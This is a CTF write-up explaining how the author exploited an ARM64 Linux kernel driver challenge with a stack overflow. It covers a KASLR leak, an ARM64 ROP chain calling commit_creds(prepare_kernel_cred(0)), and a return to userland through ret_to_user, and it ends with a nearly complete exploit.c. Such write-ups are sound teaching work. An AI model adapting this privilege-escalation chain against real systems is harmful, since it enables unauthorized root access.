ITSEC Summit

This year I had the opportunity to host a CTF that my company is organizing, I made several blockchain and pwnables, below are some of the writeups for those challenges.

Challenge

Virtual Machine

this is a qualifier round pwnables challenge that I created.

Description

Hi! I'm an undergraduate student who never took the OS and Computer Organization course. However I'm very interested in building my own machine. Can you check the security of my custom (very scuffed) virtual machine that is made specifically for (maybe) secure dynamic allocations? Deployed on Windows OS Version 10.0.26100 N/A Build 26100

See Linz's

for quite some time, I've been curious about the dark magic (sourceless/blackbox) behind windows system, I've touched a bit about it on stack based and shellcode userland concepts back in ARA CTF 2025. But I'm still blind about its dynamic memory allocator.

the more I read windows's heap, the more I found myself having a hard time trying to process a lot of new information. and I thought to myself maybe I can start implementing something basic, not necessarily taking advantage in the misuse of the dynamic memory, having to know every nitty gritty details about the windows's heap internal, algorithm and how they work. but a challenge just enough to become familiar with the basic structures and layout.

I won't make a writeup for this challenge as Linz already made a extensive one, give it a read by visiting the link below!

ITSEC CTF 2025 - VirtualMachineLinz's Blog

dame_un_grrr

this is a final round pwnables challenge created by my colleague Stanley. it features an ARM64 linux kernel.

Description

Dame un grrr (¿un qué?) Un grrr (¿un qué, un qué?) Un grrr (¿un qué?) Un grrr
author: Enryu

you can find the challenge source code in the public repository here:

https://github.com/ITSEC-ASIA-ID/2025-ITSEC-Asia-Summit-Finals/tree/main/Binary%20Exploitation/dame_un_grrrgithub.com

Vulnerability Analysis

as mentioned previously, the image of this kernel is ARM64

$ file Image 
Image: Linux kernel ARM64 boot executable Image, little-endian, 4K pages

in the run script, we can see that all of the kernel protections are enabled.

$ cat run.sh 
#!/bin/bash

exec timeout -sKILL 120 qemu-system-aarch64 \
    -machine virt \
    -m 128M \
    -cpu cortex-a55 \
    -smp cores=1,threads=1 \
    -kernel ./Image \
    -initrd ./initramfs.cpio.gz \
    -no-reboot \
    -append "console=ttyAMA0 kaslr smep smap kpti=on quiet log_level=3 panic=1 oops=panic" \
    -nographic

once ran, we can get the version of the kernel image that is running

$ uname -a
Linux (none) 5.10.54 #1 SMP PREEMPT Fri Jun 6 15:31:42 WIB 2025 aarch64 GNU/Linux

within the source code, there's only an ioctl handler, to which also has a lot of options

#define IOCTL_SET_VALUE      _IOW(IOCTL_MAGIC, 1, int)
#define IOCTL_GET_VALUE      _IOR(IOCTL_MAGIC, 2, int)
#define IOCTL_SET_STRING     _IOW(IOCTL_MAGIC, 3, char*)
#define IOCTL_GET_STRING     _IOR(IOCTL_MAGIC, 4, char*)
#define IOCTL_SET_STRUCT     _IOW(IOCTL_MAGIC, 5, struct my_data)
#define IOCTL_GET_STRUCT     _IOR(IOCTL_MAGIC, 6, struct my_data)
#define IOCTL_SET_BUFFER     _IOW(IOCTL_MAGIC, 7, struct buffer_data)
#define IOCTL_GET_BUFFER     _IOR(IOCTL_MAGIC, 8, struct buffer_data)
#define IOCTL_SET_PARTIAL    _IOW(IOCTL_MAGIC, 9, struct partial_data)
#define IOCTL_COPY_EXACT     _IOW(IOCTL_MAGIC, 10, struct exact_copy_data)

however, not all of these defined options are implemented. some of the implemented ones, although also contains bugs, are either not exploitable or irrelevant to the overall exploit.

two of the options that we will be focusing are these two

#define IOCTL_SET_BUFFER     _IOW(IOCTL_MAGIC, 7, buffer_data)
#define IOCTL_GET_BUFFER     _IOR(IOCTL_MAGIC, 8, buffer_data)

struct buffer_data {
    char __user *buffer;    
    size_t length;          
    size_t max_length;      
};

static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{

    char local_buffer[MAX_BUFFER_SIZE];
    int local_int;
    struct my_data local_data;
    struct buffer_data local_buf_info;
    struct partial_data local_partial;
    size_t copy_len;
    int ret = 0;

    printk(KERN_INFO "mydevice: ioctl called with cmd = 0x%x\n", cmd);

    if (_IOC_TYPE(cmd) != IOCTL_MAGIC) {
        printk(KERN_ERR "mydevice: Invalid ioctl magic number\n");
        return -ENOTTY;
    }

    switch (cmd) {
        case IOCTL_SET_VALUE:
            // [..SNIPPET..]
        case IOCTL_GET_VALUE:
            // [..SNIPPET..]
        case IOCTL_SET_BUFFER:
            printk(KERN_INFO "mydevice: IOCTL_SET_BUFFER with specific length\n");
            
            if (copy_from_user(&local_buf_info, (struct buffer_data __user *)arg, sizeof(struct buffer_data))) {
                printk(KERN_ERR "mydevice: Failed to copy buffer info structure\n");
                return -EFAULT;
            }
            
            if (local_buf_info.length > local_buf_info.max_length) {
                printk(KERN_ERR "mydevice: Copy length (%zu) exceeds max length (%zu)\n", 
                       local_buf_info.length, local_buf_info.max_length);
                return -EINVAL;
            }

            memset(local_buffer, 0, sizeof(local_buffer));
            
            copy_len = local_buf_info.length;
            if (raw_copy_from_user(local_buffer, local_buf_info.buffer, copy_len)) {
                printk(KERN_ERR "mydevice: Failed to copy %zu bytes from user buffer\n", copy_len);
                return -EFAULT;
            }
            
            stored_buffer_length = copy_len;
            
            printk(KERN_INFO "mydevice: Successfully copied %zu bytes to kernel buffer\n", copy_len);
            break;
        case IOCTL_GET_BUFFER:
            printk(KERN_INFO "mydevice: IOCTL_GET_BUFFER with specific length\n");
            
            if (copy_from_user(&local_buf_info, (struct buffer_data __user *)arg, sizeof(struct buffer_data))) {
                printk(KERN_ERR "mydevice: Failed to copy buffer info structure\n");
                return -EFAULT;
            }

            if (local_buf_info.length > local_buf_info.max_length) {
                printk(KERN_ERR "mydevice: Copy length (%zu) exceeds max length (%zu)\n", 
                       local_buf_info.length, local_buf_info.max_length);
                return -EINVAL;
            }

            copy_len = local_buf_info.length;            
            if (copy_len == 0) {
                printk(KERN_WARNING "mydevice: No data to copy\n");
                return -ENODATA;
            }
            
            if (raw_copy_to_user(local_buf_info.buffer, local_buffer, copy_len)) {
                printk(KERN_ERR "mydevice: Failed to copy %zu bytes to user buffer\n", copy_len);
                return -EFAULT;
            }
        
            printk(KERN_INFO "mydevice: Successfully copied %zu bytes to user buffer\n", copy_len);
            break;
        case IOCTL_SET_PARTIAL:
            // [..SNIPPET..]
        case IOCTL_SET_STRUCT:
            // [..SNIPPET..]
        case IOCTL_GET_STRUCT:
            // [..SNIPPET..]
    }
    return ret;
}

the vulnerability lies in the call to raw_copy_to_user and raw_copy_from_user because the copy_len is controllable by the user, allowing us to provide a length bigger than the stack could hold.

the check if (local_buf_info.length > local_buf_info.max_length) is deemed useless because the max_length attribute is also user supplied and not some value that is determined by the driver. thus a user can make a request with length smaller than max_length easily.

this gives us an arbitrary write and arbitrary read to the kernel's stack.

for later use, I defined these wrapper functions to interact with the ioctl handler.

void ioctl_get_buffer(char *where, u64 length) {
    buffer_data req = {
        .buffer = where,
        .length = length,
        .max_length = length+1,
    };

    if (ioctl(fd, IOCTL_GET_BUFFER, &req) < 0) error("IOCTL_GET_BUFFER");
}

void ioctl_set_buffer(char *what, u64 length) {
    buffer_data req = {
        .buffer = what,
        .length = length,
        .max_length = length+1,
    };

    if (ioctl(fd, IOCTL_SET_BUFFER, &req) < 0) error("IOCTL_SET_BUFFER");
}

Privilege Context Switch

in the famous lkmidas's blog, we're familiar with the swapgs and iretq instruction that we need to do in order to return to usermode from kernelmode in an x86_64 architecture.

before delving into exploitation, we need to study how one would do the same in an ARM64 architecture to better plan our exploit. after a bit of googling, here's the answer that I got.

AArch64 Exception LevelsWelcome to the Mike’s homepage!

first, from the above blog, we know that ARM64 has 4 levels of exeception (EL) denoting the amount of execution privilege it has. with EL0 having the least privilege, common when executing userland process and EL1 is the privilege most kernels uses.

the following blog explains it clearly how to switch from EL1 to EL0

ARMv-8a EL0<->EL1 SwitchingPyjama Brah!

in essence, when an svc instruction (an equivalent of syscall) is called, the kernel switches from EL0 to EL1, while preserving all of the registers from userland, and so before executing any further kernel code that might mess with the register, the kernel first allocate a memory and saves these registers

// context save in EL1
save_context:
    sub sp, sp, #256           // allocate space for context
    stp x0, x1, [sp, #16 * 0]  // save x0, x1
    stp x2, x3, [sp, #16 * 1]  // save x2, x3
    stp x4, x5, [sp, #16 * 2]
    stp x6, x7, [sp, #16 * 3]
    stp x8, x9, [sp, #16 * 4]
    stp x10, x11, [sp, #16 * 5]
    stp x12, x13, [sp, #16 * 6]
    stp x14, x15, [sp, #16 * 7]
    stp x16, x17, [sp, #16 * 8]
    stp x18, x19, [sp, #16 * 9]
    stp x20, x21, [sp, #16 * 10]
    stp x22, x23, [sp, #16 * 11]
    stp x24, x25, [sp, #16 * 12]
    stp x26, x27, [sp, #16 * 13]
    stp x28, x29, [sp, #16 * 14]
    stp x30, xzr, [sp, #16 * 15]  // save x30, pad with zero

later when the kernel finishes executing its routine, before returning to userland, it will restore these registers

// context restore in EL1
restore_context:
    ldp x0, x1, [sp, #16 * 0]     // restore x0, x1
    ldp x2, x3, [sp, #16 * 1]     // restore x2, x3
    ldp x4, x5, [sp, #16 * 2]
    ldp x6, x7, [sp, #16 * 3]
    ldp x8, x9, [sp, #16 * 4]
    ldp x10, x11, [sp, #16 * 5]
    ldp x12, x13, [sp, #16 * 6]
    ldp x14, x15, [sp, #16 * 7]
    ldp x16, x17, [sp, #16 * 8]
    ldp x18, x19, [sp, #16 * 9]
    ldp x20, x21, [sp, #16 * 10]
    ldp x22, x23, [sp, #16 * 11]
    ldp x24, x25, [sp, #16 * 12]
    ldp x26, x27, [sp, #16 * 13]
    ldp x28, x29, [sp, #16 * 14]
    ldp x30, xzr, [sp, #16 * 15]
    add sp, sp, #256             // free up the space (remember we allocated this in save_context)

then to return to userland, the instruction eret (an equivalent of iretq) will be executed. however, there are 3 system registers that is important and needed to setup before returning. those three are:

ELR_EL1 (Exception Link Register EL1) this is the Link Register (LR) for EL1, which means after eret is executed, where from EL1 should the CPU continue execution to EL0. normally, this register will contain the address after svc in our userland programs.
SPSR_EL1 (Saved Program State EL1) this registers holds the PSTATE of the userland process. which is taken before jumping to EL1.
SP_EL0 (Stack Pointer EL0) as the name suggest, the stack pointer in the userland process.

in ARM64, there's a lot of other system registers and later in exploitation we will observe that these three will not be enough to satisfy return to usermode cleanly and in fact there are other system registers that is needed to be nichely operated.

however, I feel like this explanation is roughly enough to get a general understanding towards the concept.

bata24 Forked GEF

a friend of mine, msfir, introduces me into a forked GEF project by bata24, which seems to have been developed for a lot of really hefty kernel debugging functionality.

GitHub - bata24/gef: GEF - GDB Enhanced Features for exploit devs & reversersGitHub

this solves several problems I usually encountered:

commonly, we would use the the extract-vmlinux script to extract the ELF executable kernel from the given boot image. however, the script seems to fail in this occasion. I tried to find solutions on the internet but to no avail. one explanation to why this occur, is because the machine architecture I'm running (x86_64) is not the same as the target image (ARM64).
for a while I have been using the pwndbg gdb for kernel ctfs. this comes with disadvantage of having the gdb blind as most of the attachment had no symbols of the image.

the forked GEF solves both of the problems with one command:

gef> vmlinux-to-elf-apply 
[+] Wait for memory scan
[+] A previously used file found, will be reused
[+] Adding symbol
[*] Execute `add-symbol-file '/tmp/gef/dump-memory-ebfdcce14ff6aa2d.elf' 0xffffdd9b19800000 -s .kernel 0xffffdd9b19800000`
add symbol table from file "/tmp/gef/dump-memory-ebfdcce14ff6aa2d.elf" at
        .text_addr = 0xffffdd9b19800000
        .kernel_addr = 0xffffdd9b19800000
warning: section .text not found in /tmp/gef/dump-memory-ebfdcce14ff6aa2d.elf

by executing the above command, gef automatically dumps the vmlinux and attempt to add symbol based on patterns. as can be seen below, as we interrupt we can see symbols added to the interface.

there are a lot of other functionalities that this specific fork can help debugging with, especially the kernel heaps and paging related as we will see in other writeups.

KASLR Leak

defeating KASLR is trivial, since we can read out of bounds in the stack, we would just read the stack, dump them and search for a kernel address as follows

fd = open(DEVICE, O_RDWR);
if (fd < 0) {
    panic("open");
}

ioctl_get_buffer(buffer, 1024);
dump_hex(buffer, 1024);

the state of the stack might be random at times, but I found these two nibbles reliable 99% of the times.

for(int i = 0; i < sizeof(buffer)/0x8; i++) {
    u64 nibble = ((u64 *)buffer)[i] & 0xfff;
    if (nibble == 0x348) {
        kbase = ((u64 *)buffer)[i] - 0x258348;
        break;
    }
    if (nibble == 0xab8) {
        kbase = ((u64 *)buffer)[i] - 0x240ab8;
        break;
    } 
}

with kernel base leaked, we can then calculate offsets for gadgets and other various function addresses.

u64 prepare_kernel_cred = kbase + 0xb1384;
u64 commit_creds = kbase + 0xb10c4;
u64 modprobe_path = kbase + 0x1b80e70;
info2("kernel base", kbase);
info2("prepare kernel cred", prepare_kernel_cred);
info2("commit creds", commit_creds);
info2("modprobe path", modprobe_path);

ROP-ing in ARM64

first, lets try to find the offset to which we control PC.

#define EGG 0x4141414141410000

for(int i = 0; i < sizeof(buffer)/0x8; i++) {
    ((u64 *)buffer)[i] = EGG + i;
}

ioctl_set_buffer(buffer, 1024+0x200);

as can be seen, the last byte of the PC register is 0x81 and it will be our offset to the start of our ROP.

next, I will discuss a bit how ARM ROP differs from x86. especially how more complex, resource consuming and kinda "less predictable", this wouldn't be a big issue if we were to only need to setup one register and call one function like in the userland system("/bin/sh"), however this would be something that needs attention when our ROP would be calling multiple functions, in this case: commit_creds(prepare_kernel_cred(0)).

we can see this in action in our buffer overflow. as can be seen below, I setup a breakpoint at the return of the vulnerable module_ioctl function routine.

although we have successfully overflowed the stack frame, at return it still continue execution and we haven't controlled PC just yet. this is due to how an ARM layout its stack.

normally, in x86 the saved return address and its saved stack pointer would be placed at the end of the stack frame, thus an overflow would overwrite the current routine's saved return address.

in ARM however, the saved return address and saved stack pointer is located at the top of the stack frame as can seen below

this means, our overflow will never overwrite the current routine's saved return address and instead (if the size is large enough) will overwrite the saved return address of the next calling stack. as can be seen below if continue stepping eventually x30/lr will contain one of our egg payload.

next is to call prepare_kernel_cred with $x0 set to 0x0. Here I will give 2 example of the complexities of an ARM ROP

1. mov then blr

first, we'll utilize the following gadget

u64 mov_x0_x20_blr_x23 = kbase + 0x235314;  // : mov x0, x20 ; blr x23

as shown in the crash dump screenshot above, we control both x20 (offset 0x83) and x23 (offset 0x86) and so we can control the value of x0 via x20 and continue execution with the next gadget stored in x23. below is our ROP payload to control x0's value and calls prepare_kernel_cred

((u64 *)buffer)[0x81] = mov_x0_x20_blr_x23;
((u64 *)buffer)[0x83] = 0x0;
((u64 *)buffer)[0x86] = prepare_kernel_cred;

for(int i = 0; i < sizeof(buffer)/0x8; i++) {
    if (i == 0x83 ) continue;
    if (((u64 *)buffer)[i] == 0x0) {
        ((u64 *)buffer)[i] = EGG + i;
    }
}

however, as it returns, we can see that it returns execution after the instruction blr x23 from our gadget and not crashes at our egg.

2. multiple rets

in this "multiple rets" problem, we'll utilize the following gadget to control x0

u64 ldr_x0 = kbase + 0x262f10;  // : ldr x0, [sp, #0x28] ; ldp x29, x30, [sp], #0x30 ; autiasp ; ret

since the value to x0 and x30 is controlled through the stack, first we ran the ROP to see which offset of our egg lands at that registers.

((u64 *)buffer)[0x81] = ldr_x0;

we can then, assign the appropriate offset to the value we want, in this case we assign at offset 0x8d the value of 0x0 and the offset 0x89 the value of prepare_kernel_cred

((u64 *)buffer)[0x81] = ldr_x0;
((u64 *)buffer)[0x8d] = 0x0;
((u64 *)buffer)[0x89] = prepare_kernel_cred;

for(int i = 0; i < sizeof(buffer)/0x8; i++) {
    if (i == 0x8d ) continue;
    if (((u64 *)buffer)[i] == 0x0) {
        ((u64 *)buffer)[i] = EGG + i;
    }
}

this indeed successfully calls prepare_kernel_cred with the value of x0 equals to 0x0, however there's a problem. as we return from it, observe the value of x30

note that the value of x30 does not change, this would cause a recursive call to prepare_kernel_cred which ultimately will exhaust memory and crashes the kernel.

this is caused by how a function call by design in ARM is not meant to be called with ret instruction, the instruction prefix (highlighted by the yellow box) to a function call will store the value of x30 and x29 at the top of the stack.

different from an x86 perspective who will continue to pop from rsp to continue execution.

compare this to the the first gadget we used

-> 0xffff800010235318 e0023fd6          <do_dentry_open+0x1b8>   blr    x23 <prepare_kernel_cred>                                                                                                                                    
                                                                                                                                                                                                                                      
   -> 0xffff8000100b1384 3f2303d5          <prepare_kernel_cred>   paciasp

after the blr x23 instruction is executed, the CPU automatically assigns the correct x30 and x29 value such that after prepare_kernel_cred returns, it will resume execution after the blr x23 callee.

ROP pattern

with the previous examples, we can conclude that to be able to call commit_creds and prepare_kernel_cred reliably, we need a ROP pattern roughly as follows:

call <REG A>
load to <REG A> from stack
load x30 from stack
return

where, step 3 and 2 can be swapped as long is it before step 4 and <REG A> will hold the function address we will call. step 2 is needed because after step 4 returns, it needs to return back to this same gadget and repeat from step 1, and thus the prerequisite to this gadget is that we need to already have control to the value of <REG A>.

in my exploit there's 2 gadget that implement this:

u64 blr_x19 = kbase + 0x852950;             // : blr x19 ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; autiasp ; ret
u64 blr_x21 = kbase + 0xdaa5c0;             // : blr x21 ; ldp x21, x22, [sp, #0x20] ; ldp x29, x30, [sp], #0x30 ; autiasp ; ret

I choose a call to x19 and x21 because as the crash dump shows, both of them are controllable by user input.

with this in mind, we can resume building our ROP chain from the first gadget until commit creds as follows

((u64 *)buffer)[0x81] = mov_x0_x20_blr_x23;
((u64 *)buffer)[0x83] = 0x0;
((u64 *)buffer)[0x86] = blr_x19;
((u64 *)buffer)[0x82] = prepare_kernel_cred;
((u64 *)buffer)[0x89] = blr_x19;
((u64 *)buffer)[0x8a] = commit_creds;

after commit creds we would now attempt to setup the system registers and execute eret to return to userland.

Manual Context Switch

to setup the SP_EL0 system register, we need a gadget for it, the gadget can be easily found using tools such as ROPgadget and others alike

u64 msr_el0 = kbase + 0x1455c;              // : msr sp_el0, x1 ; nop ; nop ; nop ; nop ; nop ; nop ; ret

however, it requires control to x1 which is also easily satisfiable via x20.

u64 mov_x1_x20_blr_x22 = kbase + 0x440580;  // : mov x1, x20 ; blr x22

again, the above gadget is handy because we control both x22 and x20.

the value we need to pass to SP_EL0 is the userland stack address, said value can be saved in the userland execution using the following function

u64 user_sp;
static inline void save_user_state(void) {
    asm volatile(
        "mov %0, sp\n"
        : "=r"(user_sp)
        :
        : "memory"
    );

    printf("[+] SP: 0x%lx\n", user_sp);
}

However, the eret and ELR_EL1 cannot be found using known tools. I then used objdump to find the those instructions

$ aarch64-linux-gnu-objdump -d ./vmlinux | grep -i "msr.*elr_el1"
ffff800010011b6c:       d5184035        msr     elr_el1, x21
ffff800010011d10:       d5184035        msr     elr_el1, x21
ffff800010012680:       d5184035        msr     elr_el1, x21
ffff800010012938:       d5184035        msr     elr_el1, x21
ffff8000100531ec:       d51d4020        msr     elr_el12, x0
ffff80001005331c:       d51a0000        msr     csselr_el1, x0
ffff80001005501c:       d51a0000        msr     csselr_el1, x0
ffff800010056ddc:       d51a0000        msr     csselr_el1, x0
ffff800010056fec:       d51a0000        msr     csselr_el1, x0
ffff80001006b26c:       d51a0002        msr     csselr_el1, x2
ffff80001006b2fc:       d5184022        msr     elr_el1, x2
ffff80001006b478:       d5184022        msr     elr_el1, x2
ffff80001006b4bc:       d51d4022        msr     elr_el12, x2
ffff80001006c78c:       d5184020        msr     elr_el1, x0
ffff80001006e130:       d5184021        msr     elr_el1, x1
ffff80001006e474:       d5184022        msr     elr_el1, x2
ffff80001006e484:       d5184023        msr     elr_el1, x3
ffff800010e1f174:       d51a0001        msr     csselr_el1, x1
ffff800010e1f214:       d5184021        msr     elr_el1, x1
ffff800010e1f360:       d51d4021        msr     elr_el12, x1
ffff800010e1f368:       d5184022        msr     elr_el1, x2
ffff800010e206dc:       d5184020        msr     elr_el1, x0
ffff800010e23870:       d5184021        msr     elr_el1, x1
ffff800010e23bb4:       d5184022        msr     elr_el1, x2
ffff800010e23bc4:       d5184023        msr     elr_el1, x3

one of them, conveniently had both control to SPSR_EL1 and at the end executes eret.

gef> x/22i 0xffff800010011b6c
   0xffff800010011b6c <el1_sync+172>:   msr     elr_el1, x21
   0xffff800010011b70 <el1_sync+176>:   msr     spsr_el1, x22
   0xffff800010011b74 <el1_sync+180>:   ldp     x0, x1, [sp]
   0xffff800010011b78 <el1_sync+184>:   ldp     x2, x3, [sp, #16]
   0xffff800010011b7c <el1_sync+188>:   ldp     x4, x5, [sp, #32]
   0xffff800010011b80 <el1_sync+192>:   ldp     x6, x7, [sp, #48]
   0xffff800010011b84 <el1_sync+196>:   ldp     x8, x9, [sp, #64]
   0xffff800010011b88 <el1_sync+200>:   ldp     x10, x11, [sp, #80]
   0xffff800010011b8c <el1_sync+204>:   ldp     x12, x13, [sp, #96]
   0xffff800010011b90 <el1_sync+208>:   ldp     x14, x15, [sp, #112]
   0xffff800010011b94 <el1_sync+212>:   ldp     x16, x17, [sp, #128]
   0xffff800010011b98 <el1_sync+216>:   ldp     x18, x19, [sp, #144]
   0xffff800010011b9c <el1_sync+220>:   ldp     x20, x21, [sp, #160]
   0xffff800010011ba0 <el1_sync+224>:   ldp     x22, x23, [sp, #176]
   0xffff800010011ba4 <el1_sync+228>:   ldp     x24, x25, [sp, #192]
   0xffff800010011ba8 <el1_sync+232>:   ldp     x26, x27, [sp, #208]
   0xffff800010011bac <el1_sync+236>:   ldp     x28, x29, [sp, #224]
   0xffff800010011bb0 <el1_sync+240>:   ldr     x30, [sp, #240]
   0xffff800010011bb4 <el1_sync+244>:   add     sp, sp, #0x150
   0xffff800010011bb8 <el1_sync+248>:   nop
   0xffff800010011bbc <el1_sync+252>:   eret

with that, after commit_creds we can append the following to our ROP payload

((u64 *)buffer)[0x8d] = mov_x1_x20_blr_x22;
((u64 *)buffer)[0x8f] = user_sp;
((u64 *)buffer)[0x85] = blr_x21;
((u64 *)buffer)[0x84] = msr_el0;
((u64 *)buffer)[0x91] = msr_elr_el1_eret;
((u64 *)buffer)[0x94] = (u64)spawn_shell;
((u64 *)buffer)[0x95] = 0x3c5;

after the execution reaches eret, we can type the sysreg command to view the system registers and make sure they are the correct value

however, after it executes the kernel hangs while being debugged. if we were to execute the exploit while not being debugged the kernel crashes.

if after eret we step into (si) the execution, we did managed to continue execution in the userland, however one thing I noticed is that the sp register still holds a kernel's stack address instead of the SP_EL0 register value.

I got stuck at this point for quite some time, I've tried to adjust the SPSR_EL1 value to other flags, use other gadgets but to no avail.

ret_to_user

eventually I ran out of ideas, what I do instead is to trace the execution up until eret under a normal execution, without any overflows.

eventually I got to this interesting looking function named ret_to_user

the function itself looks like a stub for a pure assembly code or a macro or some sort, to which then followed by finish_ret_to_user

gef> x/10i 0xffff800010012870
   0xffff800010012870 <ret_to_user>:    msr     daifset, #0xf
   0xffff800010012874 <ret_to_user+4>:  ldr     x19, [x28]
   0xffff800010012878 <ret_to_user+8>:  and     x2, x19, #0x7f
   0xffff80001001287c <ret_to_user+12>: cbnz    x2, 0xffff8000100129c0 <work_pending>
   0xffff800010012880 <finish_ret_to_user>:     nop
   0xffff800010012884 <finish_ret_to_user+4>:   nop
   0xffff800010012888 <finish_ret_to_user+8>:   tbz     w19, #21, 0xffff800010012898 <finish_ret_to_user+24>
   0xffff80001001288c <finish_ret_to_user+12>:  mrs     x2, mdscr_el1
   0xffff800010012890 <finish_ret_to_user+16>:  orr     x2, x2, #0x1
   0xffff800010012894 <finish_ret_to_user+20>:  msr     mdscr_el1, x2

executing further ahead, we would end up in a assembly similar to our previous failed gadget attempt, just without the eret instruction at the end.

stepping into the next instructions we will eventually end up in eret and with these values in the system registers

if we're to overflow and call ret_to_user after commit_creds, we would end up with the following values in the system registers.

this means, these three system registers values are in our control and we can set them as we would. after commit_creds we would append our ROP payload with the following to setup those registers with the right values:

((u64 *)buffer)[0x91] = ret_to_user;
((u64 *)buffer)[0xb6] = (u64)spawn_shell;
((u64 *)buffer)[0xb7] = (u64)0x20001000;
((u64 *)buffer)[0xb5] = (u64)user_sp;

I decided to preserve the value of SPSR_EL1 to 0x20001000 just as it would under normal execution.

and now the exploit works perfectly and we got root!

so, I guess the call to ret_to_user did other things that fixes the mess, but at this point I'm too tired to figure out what that exactly is.

I also tried to preserve the value of SPSR_EL1 to 0x20001000 using the previous failed ROP payload but it also failed.

note that, my quick observations shows that up until kernel version 5.10 the symbol to ret_to_user in /arch/arm64/kernel/entry.S still exists however the recent kernel versions have this removed.

below are the full exploit script

exploit.c

#include "libpwn.c"

#define DEVICE "/dev/arr"
#define IOCTL_MAGIC 'k'
#define IOCTL_SET_BUFFER     _IOW(IOCTL_MAGIC, 7, buffer_data)
#define IOCTL_GET_BUFFER     _IOR(IOCTL_MAGIC, 8, buffer_data)
#define EGG 0x4141414141410000

typedef struct {
    char *buffer;    
    size_t length;          
    size_t max_length;      
} buffer_data;

char buffer[1024*2];
int fd;
u64 user_sp;

void ioctl_get_buffer(char *where, u64 length) {
    buffer_data req = {
        .buffer = where,
        .length = length,
        .max_length = length+1,
    };

    if (ioctl(fd, IOCTL_GET_BUFFER, &req) < 0) error("IOCTL_GET_BUFFER");
}

void ioctl_set_buffer(char *what, u64 length) {
    buffer_data req = {
        .buffer = what,
        .length = length,
        .max_length = length+1,
    };

    if (ioctl(fd, IOCTL_SET_BUFFER, &req) < 0) error("IOCTL_SET_BUFFER");
}

static inline void save_user_state(void) {
    asm volatile(
        "mov %0, sp\n"
        : "=r"(user_sp)
        :
        : "memory"
    );

    printf("[+] SP: 0x%lx\n", user_sp);
}

int main() {
    fd = open(DEVICE, O_RDWR);
    if (fd < 0) {
        panic("open");
    }

    ioctl_get_buffer(buffer, 1024);
    // dump_hex(buffer, 1024);

    for(int i = 0; i < sizeof(buffer)/0x8; i++) {
        u64 nibble = ((u64 *)buffer)[i] & 0xfff;
        if (nibble == 0x348) {
            kbase = ((u64 *)buffer)[i] - 0x258348;
            break;
        }
        if (nibble == 0xab8) {
            kbase = ((u64 *)buffer)[i] - 0x240ab8;
            break;
        } 
    }
    u64 prepare_kernel_cred = kbase + 0xb1384;
    u64 commit_creds = kbase + 0xb10c4;
    u64 modprobe_path = kbase + 0x1b80e70;
    u64 ret_to_user = kbase + 0x12870;
    info2("kernel base", kbase);
    info2("prepare kernel cred", prepare_kernel_cred);
    info2("commit creds", commit_creds);
    info2("modprobe path", modprobe_path);
    info2("ret to user", ret_to_user);

    save_user_state();
    info2("spawn shell", (u64)spawn_shell);

    u64 ldr_x0 = kbase + 0x262f10;              // : ldr x0, [sp, #0x28] ; ldp x29, x30, [sp], #0x30 ; autiasp ; ret
    u64 ldr_x1 = kbase + 0x59a75c;              // : ldr x1, [sp, #0x68] ; mov x0, x1 ; ldp x27, x28, [sp, #0x50] ; ldp x29, x30, [sp], #0x70 ; autiasp ; ret
    u64 mov_x1_x22_blr_x23 = kbase + 0x4c1c4c;  // : mov x1, x22 ; blr x23
    u64 mov_x1_x20_blr_x23 = kbase + 0x12de3c;  // : mov x1, x20 ; blr x23
    u64 mov_x1_x20_blr_x22 = kbase + 0x440580;  // : mov x1, x20 ; blr x22
    u64 mov_x0_x20_blr_x23 = kbase + 0x235314;  // : mov x0, x20 ; blr x23
    u64 blr_x19 = kbase + 0x852950;             // : blr x19 ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; autiasp ; ret
    u64 msr_el0 = kbase + 0x1455c;              // : msr sp_el0, x1 ; nop ; nop ; nop ; nop ; nop ; nop ; ret
    u64 blr_x21 = kbase + 0xdaa5c0;             // : blr x21 ; ldp x21, x22, [sp, #0x20] ; ldp x29, x30, [sp], #0x30 ; autiasp ; ret
    u64 add_sp = kbase + 0xa7d280;              // : add sp, sp, #0x170 ; autiasp ; ret
    u64 msr_elr_el1_eret = kbase + 0x12938;

    memset(buffer, 0x0, sizeof(buffer));
    // ROP Chain, index not it order but the assignment are in order of execution/operation
    ((u64 *)buffer)[0x81] = mov_x0_x20_blr_x23;
    ((u64 *)buffer)[0x83] = 0x0;
    ((u64 *)buffer)[0x86] = blr_x19;
    ((u64 *)buffer)[0x82] = prepare_kernel_cred;
    ((u64 *)buffer)[0x89] = blr_x19;
    ((u64 *)buffer)[0x8a] = commit_creds;
    ((u64 *)buffer)[0x8d] = mov_x1_x20_blr_x22;
    ((u64 *)buffer)[0x8f] = user_sp;
    ((u64 *)buffer)[0x85] = blr_x21;
    ((u64 *)buffer)[0x84] = msr_el0;
    ((u64 *)buffer)[0x91] = ret_to_user;
    ((u64 *)buffer)[0xb6] = (u64)spawn_shell;
    ((u64 *)buffer)[0xb7] = (u64)0x20001000;
    ((u64 *)buffer)[0xb5] = (u64)user_sp;

    // FAILED ROP ATTEMPT
    // ((u64 *)buffer)[0x81] = mov_x1_x21_mov_x0_x20_blr_x23;
    // ((u64 *)buffer)[0x83] = 0x0;
    // ((u64 *)buffer)[0x86] = blr_x19;
    // ((u64 *)buffer)[0x82] = prepare_kernel_cred;
    // ((u64 *)buffer)[0x89] = blr_x19;
    // ((u64 *)buffer)[0x8a] = commit_creds;
    // ((u64 *)buffer)[0x8d] = mov_x1_x20_blr_x22;
    // ((u64 *)buffer)[0x8f] = user_sp;
    // ((u64 *)buffer)[0x85] = blr_x21;
    // ((u64 *)buffer)[0x84] = msr_el0;
    // ((u64 *)buffer)[0x91] = msr_elr_el1_eret;
    // ((u64 *)buffer)[0x94] = (u64)spawn_shell;
    // ((u64 *)buffer)[0x95] = 0x3c5;
    // ((u64 *)buffer)[0xb4] = (u64)spawn_shell;


    // FAILED ROP ATTEMPT
    // ((u64 *)buffer)[0x81] = ldr_x0;
    // ((u64 *)buffer)[0x8d] = 0x0;
    // ((u64 *)buffer)[0x89] = blr_x19;
    // ((u64 *)buffer)[0x82] = prepare_kernel_cred;
    // ((u64 *)buffer)[0x8f] = blr_x19;
    // ((u64 *)buffer)[0x90] = commit_creds;
    // ((u64 *)buffer)[0x93] = mov_x1_x20_blr_x23;
    // ((u64 *)buffer)[0x95] = user_sp;
    // ((u64 *)buffer)[0x86] = blr_x19;
    // ((u64 *)buffer)[0x94] = msr_el0;
    // ((u64 *)buffer)[0x97] = msr_elr_el1_eret;
